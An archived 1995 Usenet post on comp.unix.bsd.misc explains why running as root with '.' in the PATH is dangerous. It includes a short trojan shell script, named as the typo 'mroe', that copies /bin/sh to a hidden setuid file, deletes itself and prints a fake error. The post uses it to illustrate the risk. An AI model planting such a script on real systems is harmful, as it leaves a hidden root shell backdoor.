*BSD News Article 48193


Return to BSD News archive

Newsgroups: comp.unix.bsd.misc
Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!news.sprintlink.net!howland.reston.ans.net!swrinde!news.uh.edu!uuneo.neosoft.com!nmtigw!peter
From: peter@nmti.com (Peter da Silva)
Subject: Re: running as root with . in path Was: MacBSD ?
Message-ID: <id.44CM1.5RD@nmti.com>
Sender: peter@nmti.com (peter da silva)
Organization: Network/development platform support, NMTI
References: <3vhdsc$a1q@rigel.pixi.com> <id.TO2M1.IPE@nmti.com> <MARKG.95Aug8220219@kelly.teleport.com>
Date: Wed, 9 Aug 1995 14:40:41 GMT
Lines: 22

In article <MARKG.95Aug8220219@kelly.teleport.com>,
Mark C. Gay <markg@teleport.com> wrote:
> Any way to supress it?

You have the source code, don't you?

> Also, could you give a little more detail about how this kind of 
> security glitch would work?  Am I correct in assuming that the file
> mroe might perhaps contain a rather interesting shell script?

Something like this would do it:

	#!/bin/sh
	cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 &&
	chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 &&
	rm mroe &
	echo 'mroe: Command not found.'
-- 
Peter da Silva    (NIC: PJD2)                             `-_-'
Bailey Network Management                                  'U`
1601 Industrial Blvd.     Sugar Land, TX  77478  USA
+1 713 274 5180                                "Har du kramat din varg idag?"